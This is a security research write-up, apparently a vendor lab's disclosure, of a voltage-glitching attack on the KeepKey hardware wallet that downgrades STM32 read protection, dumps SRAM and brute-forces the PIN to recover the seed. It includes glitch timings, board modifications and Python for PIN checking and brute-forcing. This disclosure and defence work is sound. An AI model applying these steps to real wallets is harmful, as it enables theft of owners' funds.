December 10, 2019 | Security

Inside Kraken Security Labs: Flaw Found in KeepKey Crypto Hardware Wallet (Part 2)

Although much of the original KeepKey codebase is based on the Trezor One, the two codebases have diverged. The KeepKey team added several mitigation mechanisms to make the KeepKey firmware resilient to the glitching attacks demonstrated during the Wallet.Fail talk at the 35th Chaos Communication Congress; however, these proved to be ineffective. The specific glitch used against the KeepKey was based on the Wallet.Fail research and the Chip.Fail talk at Black Hat USA 2019. Most importantly, this research demonstrates that the security of a wallet like the KeepKey should not be based solely on the security of the STM32F205 microcontroller.

STM32 Boot process and Glitch Parameters

Much of the behavior of a microcontroller is defined by values it reads at power up. These include strapped pins that are read at boot (BOOT pins in the STM32 documentation) and the security configuration bits (Option Bytes in the STM32 documentation). Note, many of the following details have been determined through empirical reverse-engineering of the boot behavior of the STM32F2. Most Cortex-M microcontrollers contain ROMs that are executed at boot, commonly referred to as BootROMs. BootROMs are the first pieces of software executed by a chip and are responsible for loading important parameters, such as the security configuration of the chip. Subsequently, the user application or application code is executed. In the case of the hardware wallet, this is the actual firmware of the manufacturer. Note, because the glitching attack described in this work targets the BootROM code, it cannot be reliably mitigated by any countermeasures implemented in the vendor’s firmware. A vulnerability in the BootROM leads to an inherent hardware vulnerability that cannot be patched and requires the underlying hardware to be replaced completely with a new hardware revision.

Presumably because of the relative complexity of the STM32F2, the chip takes a long time to boot: approximately 1.2ms – 1.8ms after power cycling its supply. The boot time can be reliably measured in two ways: either by measuring the power consumption of the device and timing the initial rise in power consumption (for example, with a low-side power measurement), or by observing the behavior of the reset (NRST/JTAG RST) line of the microcontroller. Within the first 100us – 200us, the BootROM of the chip is executed.

Flash and SRAM Read Protection on the STM32

The STM32 family implements a security mechanism known as Read Protection or RDP. Because the only non-volatile storage on ARM Cortex-M devices is flash memory, the RDP value is stored in a special page of flash memory that is otherwise inaccessible for writing from the application code. The RDP value is defined by the microcontroller configuration bits known as Option Bytes. There are three Option Byte values corresponding to the three RDP levels on STM32 devices.

RDP Level	Option Byte Value	Behavior
0	0xAA	Full access to SRAM and Flash
1	Any value except 0xAA and 0xCC	Read access to SRAM, no access to Flash
2	0xCC	No access to SRAM or Flash

Table 1: RDP Levels and the corresponding Option Byte Values on STM32-Family Devices
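The mapping in Table 1 can be written as a small lookup. This is an illustrative sketch only: the function name rdp_level is hypothetical, and the code says nothing about how the BootROM actually loads or checks the value. It does make one property of the encoding visible: because Level 1 is the catch-all, any 8-bit value other than the two exact constants decodes as Level 1.

```python
def rdp_level(option_byte: int) -> int:
    """Map an RDP Option Byte value to its RDP level, following Table 1."""
    if not 0 <= option_byte <= 0xFF:
        raise ValueError("option byte must fit in 8 bits")
    if option_byte == 0xAA:
        return 0  # full access to SRAM and flash
    if option_byte == 0xCC:
        return 2  # no access to SRAM or flash
    return 1      # every other value: SRAM readable, flash not


# Every single-bit deviation from the Level 2 value decodes as Level 1.
single_bit_flips = [0xCC ^ (1 << bit) for bit in range(8)]
levels_after_flip = {rdp_level(value) for value in single_bit_flips}
print(levels_after_flip)  # prints {1}
```

Whether a voltage glitch disturbs the value in exactly this way is not something the table establishes; the sketch only shows that Level 2 depends on one exact byte value being read.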

Since the only non-volatile memory on STM32 microcontrollers is flash, this is also the only non-volatile storage for the cryptographic seeds and private keys. As a result, the flash must be protected from read out. Fortunately, the Trezor One and all of its derivatives correctly utilize the RDP feature and are shipped with and/or set RDP to RDP Level 2 on first boot (see Table 1). As a result, in practice, non-development firmwares on user devices are always at RDP2 (RDP Level 2), which prevents an attacker from accessing SRAM or Flash. However, as demonstrated by the Wallet.Fail and Chip.Fail research, downgrading RDP2 to RDP1 can reliably be performed at boot with voltage glitching. Once a device is at RDP1, its SRAM can be read out over the ARM SWD debugging protocol.

Because of the complex Power-On-Reset (POR) logic of the STM32, a normal assertion of reset (i.e. a soft reset where the NRST line is held low for a short amount of time) does not result in a full power-on reset and re-execution of the BootROM. This is also somewhat confirmed by the fact that a change in the security configuration (i.e. changing the Option Bytes to change the RDP Level) generally requires power cycling the chip. Conversely, this also means that once a chip is successfully glitched and the security configuration has been downgraded, the downgrade remains in effect until the chip is power-cycled. An attacker can therefore repeatedly attempt to glitch the device and check whether the glitch was successful while the chip is still executing the BootROM, or is very early in the application code, before the application has loaded. As a result, no countermeasure in the application code is effective against this class of attack, because the attacker can ensure that the glitch succeeded before executing the application code. Once the glitch succeeds, the attacker simply performs a soft reset of the target and the system continues to run at RDP1, allowing the attacker to read the contents of SRAM at any given point in time. This is particularly problematic as many of the libraries implementing the cryptography necessary for signing cryptocurrency transactions rely on loading sensitive information into SRAM for computation. Additionally, the cryptographic seed may be loaded into SRAM during wallet derivation and the PIN of the user may be loaded for verification against user input. If the underlying firmware is verified or if a checksum is computed to check the integrity of the firmware, parts or all of this data may also be exposed to attacks.

Defeating KeepKey Countermeasures

The KeepKey implemented several countermeasures against glitching attacks following the Wallet.Fail talk at 35C3. These include magic byte patterns in the flash as well as encrypting the seed in memory. Neither of these countermeasures was determined to be effective. Because an attacker can ensure that a glitch succeeded before executing the user application, it is trivial to prevent any magic bytes of flash from being corrupted. Moreover, since the encryption key is directly derived from the user’s PIN, the keyspace is small, especially for 4-digit PINs. Hence, the encryption key can be brute-forced in a fraction of a second on any modern PC, allowing an attacker to recover the unencrypted PIN and cryptographic seed.

Glitch setup

An in-situ glitching setup for the KeepKey

Boot times for a specific chip, i.e. a specific microcontroller of a specific KeepKey, depend on several parameters and unique characteristics of the microcontroller. These include manufacturing variances of the silicon in the microcontroller as well as variances in the capacitances of the PCB, the temperature, as well as the voltages supplied to the device. To remove some of the external variances it is necessary to modify the PCB to remove any external components that may adversely affect the glitch waveform supplied to the target. Alternatively, a custom PCB can be used that lacks these external components.

The previous Wallet.Fail and Chip.Fail research presentations demonstrated that a successful glitch against the STM32 can be performed by supplying a glitch to the Vcore voltage of the microcontroller. To perform the glitch, the target is power-cycled, and a glitch waveform is supplied to the Vcore pins of the microcontroller after system boot (when the NRST line goes high). Because the offset in time at which the Option Bytes are loaded is unknown and depends on the unique manufacturing characteristics of the silicon as well as external parameters such as temperature, it is easier to create a search space of varying delays and iteratively perform the following steps:

1. Power-cycle the target
2. Delay for a given amount of time
3. Perform the glitch
4. Attempt to enumerate the taps of the JTAG interface
5. If no taps could be enumerated, increase the delay and repeat from Step 1

A Python script was used for automation and an FPGA was used to accurately control power-cycling the target, delaying, and supplying the glitch select signal to the multiplexer (i.e. glitching the target). After every glitch attempt, the JTAG interface was enumerated. If JTAG could be enumerated, the glitch had succeeded.

Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4)
Info : JTAG tap: auto1.tap tap/device found: 0x06411041 (mfg: 0x020 (STMicroelectronics), part: 0x6411, ver: 0x0)

Successful JTAG tap enumeration by OpenOCD.
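The search over glitch delays can be sketched in a few lines of Python. This is not the script used in the research. The names search_glitch_delay, attempt and fake_attempt are hypothetical, the hardware side is reduced to a callback, and the 1 us step size is an assumption. Success is detected by looking for "tap/device found" lines like the ones in the OpenOCD output above.

```python
import re
from typing import Callable, Iterable, List, Optional

# Matches OpenOCD lines such as
# "Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (...)"
TAP_FOUND = re.compile(r"tap/device found: (0x[0-9a-fA-F]{8})")


def enumerated_taps(openocd_log: str) -> List[str]:
    """Return the IDCODEs of all JTAG taps reported in an OpenOCD log."""
    return TAP_FOUND.findall(openocd_log)


def search_glitch_delay(
    delays_ns: Iterable[int],
    attempt: Callable[[int], str],
) -> Optional[int]:
    """Try each delay in turn and return the first one that exposes JTAG.

    `attempt(delay_ns)` is a placeholder for the hardware side: it should
    power-cycle the target, wait `delay_ns` after NRST goes high, fire the
    glitch, run the JTAG scan, and return the resulting log text.
    """
    for delay_ns in delays_ns:
        if enumerated_taps(attempt(delay_ns)):
            return delay_ns
    return None


# Stand-in for real hardware so the sketch runs on its own: pretend that
# only a delay of exactly 170 us succeeds. Real behaviour is far noisier.
def fake_attempt(delay_ns: int) -> str:
    if delay_ns == 170_000:
        return ("Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 "
                "(mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4)")
    return ""  # no taps reported


found = search_glitch_delay(range(160_000, 200_001, 1_000), fake_attempt)
print(found)  # prints 170000
```

On real hardware a given delay is unlikely to succeed on every attempt, so a practical loop would probably repeat each delay several times before moving on.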

For interfacing with the target’s debugging interfaces, OpenOCD was used. Because debugging the chip over the ARM SWD interface results in a Non-Maskable Interrupt (NMI) that halts the device, JTAG tap enumeration, which did not result in an NMI, was used to test whether debugging had been enabled. Successful enumeration of the tap devices meant that debugging had indeed been enabled and that a snapshot of SRAM could subsequently be captured over ARM SWD.

On the multiple devices tested as part of this research, successful glitching and downgrading of RDP occurred approximately 160us – 200us after the NRST line had gone high. For glitching, a 200ns pulse was supplied to the select line of a MAX4619 analog multiplexer. The MAX4619 toggled between approximately 1.38 V, which was supplied to ensure that the Low-Dropout Regulator (LDO) in the STM32 shut off, and 0 V (i.e. GND).
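To get a feel for these numbers, the timings can be converted into clock cycles of the controlling FPGA. The FPGA clock frequency is not given here, so the 100 MHz used below is purely an assumption for illustration, and ns_to_cycles is a hypothetical helper.

```python
FPGA_CLOCK_HZ = 100_000_000  # assumed 100 MHz; not stated in the text


def ns_to_cycles(duration_ns: int, clock_hz: int = FPGA_CLOCK_HZ) -> int:
    """Convert a duration in nanoseconds to whole clock cycles (rounded)."""
    return round(duration_ns * clock_hz / 1_000_000_000)


window_start = ns_to_cycles(160_000)  # 160 us after NRST goes high
window_end = ns_to_cycles(200_000)    # 200 us after NRST goes high
pulse_width = ns_to_cycles(200)       # 200 ns glitch pulse

print(window_start, window_end, pulse_width)  # prints 16000 20000 20
print(window_end - window_start + 1)          # prints 4001
```

Under that assumption, an exhaustive sweep of the observed window at single-cycle resolution covers 4001 candidate delays, each of which costs one power cycle of the target.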

In-Situ Glitch

Creating a custom PCB to glitch a device requires additional time and effort, although it gives more reproducible results, with less preparation per device, when the attack is performed against many devices en masse. Hence, as a proof of concept, it makes sense to first modify a stock target PCB and adapt it to work with the glitch setup. Most notably, any components that can filter or otherwise affect the glitch pulse before it reaches the target microcontroller must be removed. Most important among these are the bypass capacitors that are added to stabilize the voltage supplied to the microcontroller.

Necessary modifications to the KeepKey PCB for in-situ glitching

On the KeepKey PCB, R42 and R43 are the bypass capacitors for the core voltage of the microcontroller and must be removed. Additionally, there is a sequencer IC, U4, that ensures a stable voltage and delays the microcontroller from booting. This additional startup delay makes the process of iteratively glitching the target slower, hence it should also be removed. The sequencer circuit also has two series resistors connected to it and NRST, R50 and R63, respectively. R50 should be removed, while R63 needs to be bridged, or removed and bridged, for reliable glitching.

A modified KeepKey PCB

Socketed Glitch Setup

The Wallet.Fail presentation at 35C3 demonstrated a socketed STM32 glitcher. This included a custom PCB with a mechanical socket compatible with the LQFP64 package of the STM32F205 used in the Trezor One and the KeepKey. The STM32F205 can be inserted into the socket without soldering. As a result, in-situ modifications become entirely unnecessary. The MCU can simply be removed from the KeepKey board and then physically inserted into the socket adapter in under one minute. There is no rewiring to be performed for subsequent devices as the underlying PCB of the socketed setup provides all the necessary connections.

The following attack was successfully executed using the socketed setup. First, the KeepKey was upgraded to the latest firmware and a BIP39 seed phrase was generated and recorded. Subsequently, a wallet was created and a small amount of cryptocurrency was transferred to it, so that the success of the attack could later be verified. The MCU was then removed from the KeepKey and placed into the socket. Because the bootloader of the KeepKey initializes internal clocks using the internal PLL, it requires an external 8MHz oscillator to run, and the system failed to boot without an external clock source. A signal generator was therefore used to supply the necessary clock waveform as per the STM32F205 datasheet. Once the external clock was supplied, the bootloader was able to initialize internal clocks and continue booting in the socket. If a signal generator is not available, the PCB provides footprints for mounting a quartz oscillator and the corresponding capacitors.

With the system properly clocked, the MCU in the socket boots to the same state as in the in-situ setup. Therefore, the glitch can now be applied, RDP downgraded from RDP Level 2 to RDP Level 1, and the user application executed. Once the user application is executed, the encrypted BIP39 seed phrase and the PIN are loaded into memory. At this stage, it is possible to verify that RDP Level 1 is still active by enumerating the JTAG tap devices and subsequently capturing a snapshot of SRAM by writing the SRAM contents to a file.

The socketed setup is an alternative seed extraction method with identical results to that of the in-situ glitch. It is invasive but not fully destructive, as the MCU can be reworked and replaced on the original board and the case reassembled. Note, the KeepKey enclosure is difficult to open at first, but with some practice it can be opened quickly with minimal damage to the outside, as there are mechanical snaps holding the upper and lower enclosure together. Once the seed has been extracted, an attacker could restore the BIP39 seed phrase on any other wallet that supports BIP39. If the intent of the attacker was to gain a user’s seed to steal the user’s funds at a later point in time, an attacker could restore the seed onto a brand new KeepKey device and return the new KeepKey unbeknownst to the victim.

Extracting the Secrets

The downgrade attack from RDP2 to RDP1 on its own is not enough to compromise the seed of the wallet: RDP1 only allows read-out of the RAM, while the seed is normally stored in flash. To compromise the seed, it was necessary to find a code path that loads the seed into RAM without first authenticating with the PIN, so that it can then be read out using the debugging interface.

A manual code-review revealed that the KeepKey firmware loads all configuration data (including an encrypted version of the seed) into memory on a regular boot and before entering the PIN.

The full code-path that leads to this is:

lib/firmware/keepkey_main.c: main
lib/firmware/storage.c: storage_init
lib/firmware/storage.c: storage_fromFlash

The structure that is loaded into RAM is called Storage:

typedef struct _Storage {
    uint32_t version;
    struct Public {
        uint8_t wrapped_storage_key[64];
        uint8_t storage_key_fingerprint[32];
        bool has_pin;
        uint32_t pin_failed_attempts;
        bool has_language;
        char language[16];
        bool has_label;
        char label[48];
        bool imported;
        uint32_t policies_count;
        PolicyType policies[POLICY_COUNT];
        bool has_auto_lock_delay_ms;
        uint32_t auto_lock_delay_ms;
        bool passphrase_protection;
        bool initialized;
        bool has_node;
        bool has_mnemonic;
        bool has_u2froot;
        HDNodeType u2froot;
        uint32_t u2f_counter;
        bool no_backup;
    } pub;
    bool has_sec;
    struct Secret {
        HDNodeType node;
        char mnemonic[241];
        char pin[10];
        Cache cache;
    } sec;
    bool has_sec_fingerprint;
    uint8_t sec_fingerprint[32];
    uint32_t encrypted_sec_version;
    uint8_t encrypted_sec[512];
} Storage;

The storage structure consists of:

Storage version number
Public structure containing the label, language and other information about the device
Secret structure, which contains the unencrypted seed etc. after the device has been unlocked
sec_fingerprint containing the fingerprint of the encrypted storage
encrypted_sec, a 512 byte long encrypted container that gets decrypted into the Secret structure after a successful pin unlock.

A simple Synalyze It! grammar was written for introspecting RAM dumps of the device. It can be used to quickly navigate through the Storage structure:

Synalyze It! Pro with a custom grammar to highlight the Storage structure contents

It was found that the Public structure also contains a wrapped_storage_key as well as a storage_key_fingerprint: When a user enters the PIN into the device, the wrapped_storage_key is AES decrypted using the SHA512 hash of the entered PIN. The hash of that decrypted storage key is then compared to the storage_key_fingerprint:

User enters PIN
PIN is stored as C-string ($PIN)
$PIN_SHA_512 = SHA512($PIN)
$KEY = $PIN_SHA_512[0..32]
$IV = $PIN_SHA_512[32..48]
$DECRYPTED_KEY = AES256-CBC($KEY, $IV, $wrapped_storage_key)
If SHA256($DECRYPTED_KEY) == $storage_key_fingerprint
Correct PIN entered

In Python, this can be expressed as:

import hashlib
from Crypto.Cipher import AES

# PIN is the candidate PIN as bytes; wrapped_storage_key and
# storage_key_fingerprint are taken from the Public part of Storage.
pin_hash = hashlib.sha512(PIN).digest()
key = pin_hash[:32]   # AES-256 key
iv = pin_hash[32:48]  # CBC initialization vector
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_wrapped_storage_key = cipher.decrypt(wrapped_storage_key)
fingerprint = hashlib.sha256(decrypted_wrapped_storage_key).digest()
if fingerprint == storage_key_fingerprint:
    print("Successful PIN entry")

The decrypted wrapped_storage_key (referred to as storage_key in the following description) can then be used to decrypt the encrypted_sec array of the Storage structure. For this, the first 32 bytes of the storage_key are used as the decryption key, while the next 16 bytes are used as IV. The encrypted_sec array can then be decrypted using AES-256 in CBC mode.

Based on this, a Python tool was written that brute-forces the PIN of a memory dump and then extracts the (decrypted) encrypted_sec data into an output file. To improve the performance of the brute-force attack, the tool can utilize multiple processes to take advantage of multiple cores. A KeepKey PIN can be at most 9 digits long. On a modern laptop, attempting all 9-digit PIN combinations takes no longer than 10 minutes. A GPU-accelerated version could potentially be significantly faster.
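The core loop of such a brute-force search might look like the following. This is a single-process sketch and not the tool described above. All function names are hypothetical, the digit alphabet is an assumption, and the AES-256-CBC step is passed in as a callable so that the example runs with the standard library alone.

```python
import hashlib
from itertools import product
from typing import Callable, Iterator, Optional, Tuple

# (key, iv, ciphertext) -> plaintext; expected to be AES-256-CBC decryption.
Decryptor = Callable[[bytes, bytes, bytes], bytes]


def candidate_pins(max_len: int, digits: str = "0123456789") -> Iterator[bytes]:
    """Yield every PIN of length 1..max_len, shortest first."""
    for length in range(1, max_len + 1):
        for combo in product(digits, repeat=length):
            yield "".join(combo).encode("ascii")


def derive_key_iv(pin: bytes) -> Tuple[bytes, bytes]:
    """Split SHA-512(PIN) into a 32-byte key and a 16-byte IV."""
    digest = hashlib.sha512(pin).digest()
    return digest[:32], digest[32:48]


def brute_force_pin(wrapped_key: bytes, fingerprint: bytes,
                    decrypt: Decryptor, max_len: int = 9) -> Optional[bytes]:
    """Return the first PIN whose unwrapped key matches the fingerprint."""
    for pin in candidate_pins(max_len):
        key, iv = derive_key_iv(pin)
        storage_key = decrypt(key, iv, wrapped_key)
        if hashlib.sha256(storage_key).digest() == fingerprint:
            return pin
    return None


# Demo with a toy XOR "cipher" so the sketch runs without third-party
# packages. It is NOT AES and only exercises the search loop.
def toy_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    pad = (key + iv) * (len(data) // 48 + 1)
    return bytes(a ^ b for a, b in zip(data, pad))


secret_key = bytes(range(64))
demo_key, demo_iv = derive_key_iv(b"4821")
wrapped = toy_decrypt(demo_key, demo_iv, secret_key)  # XOR is its own inverse
fp = hashlib.sha256(secret_key).digest()
print(brute_force_pin(wrapped, fp, toy_decrypt, max_len=4))  # prints b'4821'
```

Against a real memory dump, the decrypt argument would need to be genuine AES-256-CBC, for example lambda key, iv, data: AES.new(key, AES.MODE_CBC, iv).decrypt(data) with PyCryptodome. Splitting the candidate range across worker processes is left out of this sketch.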